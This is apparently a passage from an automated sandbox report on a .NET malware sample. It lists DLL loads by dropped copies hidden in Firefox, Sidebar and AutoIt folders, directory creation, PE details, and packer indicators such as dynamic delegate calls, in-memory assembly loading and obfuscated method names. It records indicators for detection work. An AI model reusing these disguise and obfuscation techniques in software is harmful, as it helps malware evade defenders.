            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: mscoree.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: apphelp.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: version.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: uxtheme.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: windows.storage.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: wldp.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: profapi.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: cryptsp.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: rsaenh.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: cryptbase.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: sspicli.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: mscoree.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: version.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: uxtheme.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: windows.storage.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: wldp.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: profapi.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: cryptsp.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: rsaenh.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: cryptbase.dll
            Source: C:\Users\Public\AccountPictures\Registry.exeSection loaded: sspicli.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: mscoree.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: apphelp.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: version.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: wldp.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: profapi.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: sspicli.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: mscoree.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: version.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: wldp.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: profapi.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\StartMenuExperienceHost.exeSection loaded: sspicli.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: mscoree.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: apphelp.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: uxtheme.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: windows.storage.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: wldp.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: profapi.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: cryptsp.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: rsaenh.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: cryptbase.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: sspicli.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: mscoree.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: uxtheme.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: windows.storage.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: wldp.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: profapi.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: cryptsp.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: rsaenh.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: cryptbase.dll
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeSection loaded: sspicli.dll
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeDirectory created: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeDirectory created: C:\Program Files\Windows Sidebar\Gadgets\26c12092da979cJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeDirectory created: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeDirectory created: C:\Program Files\Mozilla Firefox\fonts\645bc6bab0f65cJump to behavior
            Source: oFAjWuoHBq.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: oFAjWuoHBq.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
            Source: oFAjWuoHBq.exeStatic file information: File size 2403328 > 1048576
            Source: oFAjWuoHBq.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x247200
            Source: oFAjWuoHBq.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdbU.o. a._CorDllMainmscoree.dll source: oFAjWuoHBq.exe, 00000000.00000002.2053492926.000000001B500000.00000004.08000000.00040000.00000000.sdmp, oFAjWuoHBq.exe, 00000000.00000002.2030805631.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp, tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, 00000011.00000002.2085969443.0000000003111000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdb source: oFAjWuoHBq.exe, 00000000.00000002.2053492926.000000001B500000.00000004.08000000.00040000.00000000.sdmp, oFAjWuoHBq.exe, 00000000.00000002.2030805631.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp, tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, 00000011.00000002.2085969443.0000000003111000.00000004.00000800.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            .NET source code contains method to dynamically call methods (often used by packers)
            Source: oFAjWuoHBq.exe, sWIJymEd3TnvLXnsdXU.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            .NET source code contains potential unpacker
            Source: oFAjWuoHBq.exe, vcQJskW4wjByrVXDpqp.cs.Net Code: XBaoAwE39x System.AppDomain.Load(byte[])
            Source: oFAjWuoHBq.exe, vcQJskW4wjByrVXDpqp.cs.Net Code: XBaoAwE39x System.Reflection.Assembly.Load(byte[])
            Source: oFAjWuoHBq.exe, vcQJskW4wjByrVXDpqp.cs.Net Code: XBaoAwE39x
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeCode function: 17_2_00007FF848F400BD pushad ; iretd 17_2_00007FF848F400C1
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeCode function: 18_2_00007FF848F400BD pushad ; iretd 18_2_00007FF848F400C1
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeCode function: 24_2_00007FF848F400BD pushad ; iretd 24_2_00007FF848F400C1
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeCode function: 25_2_00007FF848F400BD pushad ; iretd 25_2_00007FF848F400C1
            Source: oFAjWuoHBq.exe, C18IexyuqO3X6bU42Vn.csHigh entropy of concatenated method names: '_4J6', '_5Di', '_1y5', '_77a', '_1X1', '_7fn', 'OUK', '_8S4', 'wUn', '_447'
            Source: oFAjWuoHBq.exe, itivEpyXAAQjEFUSCAp.csHigh entropy of concatenated method names: 'ICU', 'j9U', 'IBK', '_6qM', 'Amn', 'Mc2', 'og6', 'z6i', '_5G6', 'r11'
            Source: oFAjWuoHBq.exe, LH8aa71HOuQSRug8cwM.csHigh entropy of concatenated method names: 'fJih49MPey', 'UlKhYwXm9S', 'sLohu0YDVb', '_3Gf', '_4XH', '_3mv', '_684', '_555', 'Z9E', 'pHnhc78ltP'
            Source: oFAjWuoHBq.exe, O533fko5EpA7Hjr0g5s.csHigh entropy of concatenated method names: 'rO3bwX6bU4', 'IVnbKROUq0', 'I9KbZxDJjU', 'RWIbrG0yCZ', 'VLhb860CJJ', 'WVPZDCbmpt6NGdY5IKw', 'zTcgKTbGXyAIqqADwEl', 'kZanohbRvYajwwg8Tie', 'Dyec4dbhLmIf8BTIet8', 'rnURRNbNASuFv1dMXDR'
            Source: oFAjWuoHBq.exe, XL0iThzPQJTYWWJ3UB.csHigh entropy of concatenated method names: 'Y29', 'YZ8', 'jn6', 'G9C', 'zsxLGfmpmPsCGCYwHD4', 'gKVOY2mRhwwr81YVSff', 'y4bCOumhVcgmnGQmqWH', 'yodKm6mm6WoE7cjZvfZ', 'KIGL5xmGi9wqAfTYEZp', 'kTTZg5mNqG7ZTQYuk3u'
            Source: oFAjWuoHBq.exe, td4rKTEu7UWFH3n2Zvv.csHigh entropy of concatenated method names: 'L5U3LbeeQWpXV', 'OjhPGE09N0jUrqLvEbd', 'YsXuJZ0dLC059ILc6mG', 'xr8q9g0fffPhBpDlIFf', 'P5wyR10BTsJSbdTYWPm', 'AlF9T202mxHbaErvZJB', 'RKj0CA0tbh6qwqmynyG', 'yR90T70g86aw1ls4RYx', 'c5qw6h0Awycs4Tix21U', 'YTEKvr08saO5pmq70HI'
            Source: oFAjWuoHBq.exe, hZiEsmfZFcSKOlYV9qM.csHigh entropy of concatenated method names: 'FkTRyQE1CT', 'ocwRfu67mF', 'IOrR1eBBGm', 'jebRE4cgko', 'G7oRb0BaEw', 'lOCR4IwsEG', 'FFFRYUSO7u', 'lidRuXJkNH', 'E5qRcN30X5', 'aQdRMo83mD'
            Source: oFAjWuoHBq.exe, hF88NYCTSKrIITHcubX.csHigh entropy of concatenated method names: 'm9pWuMLroG', 'kv4WcZ90Mw', 'PI9BseuogPaAaIxQ0JI', 'b5jjW7usxr8xG3FFNw6', 'tJ5BJBuuh1J8MlH4x6P', 'wiL72XujTImTRGF86RR', 'qOiACautYyn7hOMQALQ', 'hFFLGMugZjoXJIyjbUD', 'ejZOoJu9OWCDb73bVHo', 'YPLtb8udRn1psMvSbPw'
            Source: oFAjWuoHBq.exe, MLqUbOC5FRrvvhuJfxl.csHigh entropy of concatenated method names: 'yiQ', 'YZ8', '_5li', 'G9C', 'VODxsyNEgxToDq9NJkU', 'WSlPRIND1MexbhQftyf', 'AtnsNmNX4AIr4jCohGk', 'BnqLeeNpm7xJBx9uRvF', 'vJrcmdNR4R8FBFIY3d0', 'd3BwfMNh7REIit8ngJs'
            Source: oFAjWuoHBq.exe, tPdkxhonf1CIRrb8hfC.csHigh entropy of concatenated method names: 'sg9', 'KuhIlnaxSZ', 'zot4Xf5hoG', 'sFeI9VdyN9', 'BWL1wkMQUDKcj8Q0R5V', 'lUDm45MndS9QvrcND9k', 'kn1bfDM1Ld72yESjqQW', 'cI8f6fM0Tpl57PItVTV', 't2fTiAMyZxHB2vskZ3j', 'n2cXcoMWluhpyDKh1kF'
            Source: oFAjWuoHBq.exe, notAaue7ZrBJ8DsXOu.csHigh entropy of concatenated method names: 'g25', 'YZ8', '_23T', 'G9C', 'Dy9vGd5wH', 'Sx2YyQXFleA96yICsUs', 'lT3bhRXYPHnDMweS48h', 'G124afXeqSndDfQNsET', 'IOjUhAXIsys5jgkY9lw', 'DvVBkPXiQa9yUQTPL6Q'
            Source: oFAjWuoHBq.exe, sFL7fe10HOVS6xhRTUD.csHigh entropy of concatenated method names: '_159', 'rI9', '_2Cj', 'XG2hR7aLyO', 'ovIhNtuhVV', 'Cwqhht6ALk', 'IZghsghpB5', 'b26hHPkM6R', 'EA7hU1ZC87', 'swSDCMrevI5WytaYFMG'
            Source: oFAjWuoHBq.exe, BXBkI5y4HWNAxVSphr1.csHigh entropy of concatenated method names: 'uxk', 'q7W', '_327', '_958', '_4Oz', 'r6z', 'r7o', 'Z83', 'L5N', 'VTw'
            Source: oFAjWuoHBq.exe, OwI9UdorJeiK15bvkny.csHigh entropy of concatenated method names: 'QcTpvHkeqjiXlZTBWCl', 'mZSOBLkI2U3JMGHaPIJ', 'Dgud79kFNKNqPjYIIva', 'nqGdoVkYo2fnlPeTB3E', 'IWF', 'j72', 'ooyYgX9uCK', 'n5DY5uDemQ', 'j4z', 'SocYqIH0VQ'
            Source: oFAjWuoHBq.exe, MjVNDyf8m9C5qT2jGJR.csHigh entropy of concatenated method names: 'q4Y', '_71O', '_6H6', 'LlhRB575ki', '_13H', 'I64', '_67a', '_71t', 'fEj', '_9OJ'
            Source: oFAjWuoHBq.exe, Q6LCvdyhHTVvD2Zq8KC.csHigh entropy of concatenated method names: 'JqedefxCWX', 'wBtdpCEIyb', 'BSVd6CSspt', 'sTgd7RM8tQ', 'HhHd24TiJ5', 'fvfU5hlAYq9ThpMZAEK', 'IBF9EDlBpgrZ5V73Esv', 'EppX8Dl28xIpaK4MtIf', 'Jdpb1jl8n7NWOWZjguu', 'MGKbZ8lvsg8kQWWOhxt'
            Source: oFAjWuoHBq.exe, VgZuJICoAnnnggcdWDe.csHigh entropy of concatenated method names: 'R1x', 'YZ8', '_8U7', 'G9C', 'Q8m4uVma1i8HoUCHsBy', 'gXdW0NmUnmae9u6U0al', 'qyIEswm75o1RpU2aR3L', 'fpF5vYm5lLQshWHn3Ci', 'Mo5ttTmqsY0ExPFRXuS', 'Ly5fYOmF8CvDbrn6Fki'
            Source: oFAjWuoHBq.exe, PRv6YTCfKvBB74DQ91n.csHigh entropy of concatenated method names: 'K55', 'YZ8', '_9yX', 'G9C', 'ecBh4Om0Agx86PTfEuZ', 'Sn2EUomy2qM2BKkxvRU', 'xnTMygmQfrJPrkRhJgb', 'Mh1VIpmnappDpjCIvuh', 'JVljolm13W2bhMg99rb', 'dgcYZZmWnpnLPRnTLC5'
            Source: oFAjWuoHBq.exe, UhEagAChdymwejGsiAX.csHigh entropy of concatenated method names: 'Ai7', 'YZ8', '_56U', 'G9C', 'UA6k2TNLEyIvjyLAII1', 'lc7xhANzNk6Po8nc2r1', 'tMouvZSE3Q3EMXHr8WZ', 'NPvcwZSDrfBwuu8Sdly', 'PxOZuWSXWgOvEqmr6Uo', 'yifNjCSpha2PoVsdMaF'
            Source: oFAjWuoHBq.exe, UDaXAKWWVgTW4lwb7dx.csHigh entropy of concatenated method names: 'tQKW9LZGAR', 'U0CWPeWCLs', 'gdIWSw88JX', 'NMDWO9XdKe', 'vUDWwdOk41', 'fKGWKP7Rsf', 'jybHRSjB3jLbsdFH98f', 'oq53JTj2F6E1OcV0FSo', 'aJwBCajd3QgyTXjtiDY', 'BSnqs8jfkNZSNGEiVGi'
            Source: oFAjWuoHBq.exe, hAIYl7yLKCWNlk7chwE.csHigh entropy of concatenated method names: 'WbPMet4WuH', 'CEBMppw6lJ', 'gRsM6mqX1f', 'MD8M7WgLkI', 'aXTM2tatP5', 'uTTgeAOFtE3MqE4RGo0', 'DskT4MOYSVCwRX1BGu0', 'Gd1cblO5cEIDyL3nZ6i', 'Ej6CQLOqStm5THAyHBW', 'M3rw3rOemxk3sIVEPDw'
            Source: oFAjWuoHBq.exe, EDrgRf1SIQNkPQLfuDP.csHigh entropy of concatenated method names: 'AXXUmyyjPk', '_1kO', '_9v4', '_294', 'kMeUBF9BLq', 'euj', 'wwnUkwWSoB', 'dRYURG5g4R', 'o87', 'd41UNWTpxx'
            Source: oFAjWuoHBq.exe, CFBsI01WJbRR9QM9EJO.csHigh entropy of concatenated method names: 'cG3NbosIte', 'sVAN45w6c1', '_8r1', 'SwvNYd9owp', 'oRsNufqdoq', 'q3LNc3FjFl', 'sO0NMRxKxV', 'jdj7D03dtdULnfgkZsc', 'EuT8wL3fqIvNGLwHGgy', 'Pg2RVc3BqMjwma8S5XL'
            Source: oFAjWuoHBq.exe, nGTb8eCAkDE2Ou3IqwW.csHigh entropy of concatenated method names: 'rU3', 'YZ8', 'M54', 'G9C', 'kEMcNEGi2hoahmc2Svv', 'BVe84aG3pJ0MAaNIX2Z', 'WZbwliGwoXyldd59mFj', 'XQky6eGr1Rb5ZYeLdGp', 'hV9p2GGCW8USe2n7QWR', 'osfLxAGZXfu2NCsaxpV'
            Source: oFAjWuoHBq.exe, cs1uPX1FlBpBw3FANe7.csHigh entropy of concatenated method names: 'PdPRDr0drG', 'UxjRTWaPOJ', 'EGHR9a7iTD', 'NVRRPdLYXf', 'p2GRStLAuJ', 'ohTRO7HiXB', '_838', 'vVb', 'g24', '_9oL'
            Source: oFAjWuoHBq.exe, seZMJm2gMaojmHuI3e.csHigh entropy of concatenated method names: '_59M', 'YZ8', '_1zA', 'G9C', 'GhaQrMpYMYQ8hOE1w3j', 'Y3Eu9ppe5HrITcP3I0T', 'HdexwbpI1W9k0w23ibB', 'bBv4xPpiSesKiUXq5i9', 'os5Pwnp3t3KIHiw0Ztc', 'juw7Vbpw5F12o9CgSao'
            Source: oFAjWuoHBq.exe, PZv7ZiERParVd0OGhgI.csHigh entropy of concatenated method names: 'AVV0kBJcY1', 'zqy0RWQ7x4', 'LBp0NrEkro', 'JHn0hGYj1m', 'PIV0sXrWur', 'O170HKUOJ3', 'Wtj0U8ykqi', 'nMG0xmsrub', 'Uwr00tBduX', 'Uev0ieFydw'
            Source: oFAjWuoHBq.exe, FQ44cfWVykmHgWr3CXV.csHigh entropy of concatenated method names: 'eJoydvBxJk', 'iTWyAI9f7R', 'D2t8x19k3HeXlaw8iOH', 'rhiEH39VUR6nJthdlkF', 'VhECDG9MHGcQL7al6MW', 'unkytm94B5ZFiBHRnX3', 'w6YX6G9OHyIVjunueno', 'rK6XNu9l4OwE75xB0e5', 'e0SxSG9PjL3lULU3kOP', 'Fyn7Ym9JdmC6exSXFGF'
            Source: oFAjWuoHBq.exe, i6xiYLfo7SHS2xFueZb.csHigh entropy of concatenated method names: 'J0ScIg5MJa8vjFprnSf', 'che5ce54ottDjKv547V', 'pCh6SY5v2LWTsnllfYI', 'OqJ2kD5bBYs4M1FiQAa', 'yiUVk1McI4', 'WBHNPT5OQtNeWwaSl4W', 'ilU4Vj5lT0uPPk1E04y', 'dES3615kaUL34Ok7wH2', 'GPTEEY5VAY8xtvebWtD', 'd5R1hW5PDLkRXCdgWBl'
            Source: oFAjWuoHBq.exe, CPIc2kIQFt0KqmIp84.csHigh entropy of concatenated method names: '_468', 'YZ8', '_2M1', 'G9C', 'b8CPGnRBAW98cAvXg3a', 'Aax9j7R2gTyTNFRErFX', 'DogMFFRAfvKXgdcUTcn', 'NjSSqkR8KtrOptvM1L1', 'RRt26gRvMfpbnBC5q6f', 'RuhheKRbyRqMC3qP5t1'
            Source: oFAjWuoHBq.exe, VmIaQn0cbxUy13cZed.csHigh entropy of concatenated method names: '_52Y', 'YZ8', 'Eg4', 'G9C', 'hPPtSVgTq', 'woLpeTXAZEwjhQvVwFJ', 'TlDoQWX8T6h8cmQCAF2', 'tPULXaXvee7PZLf8pRU', 'muDIE2XbIMSkSVUErWd', 'MJkZpbXMuGkskAeV6vR'
            Source: oFAjWuoHBq.exe, E4xFHtoa5SEr734cFvt.csHigh entropy of concatenated method names: '_525', 'L97', '_3t2', 'UL2', '_6V2', '_968', 'SuK8CoMtrp6UgQaoC5x', 'wXrZYmMgqsemtpbPPEG', 'ECcYnUM9vMfMZSXSmLX', 'XcgvK2MdQmRvUJkjJsY'
            Source: oFAjWuoHBq.exe, dQODLTCM14V6TRuYFrB.csHigh entropy of concatenated method names: 'd43', 'YZ8', 'g67', 'G9C', 'xjtJocGlvIvu1TG15qq', 'UeKi9aGPoheMP6VHt3c', 'cnWmkiGJm29PWPV2oVH', 'hY9D1GGasuAqeuDWBE3', 'ie3Z4tGUIfntnxUQspi', 'StZDtdG7HBOZ41GVQP1'
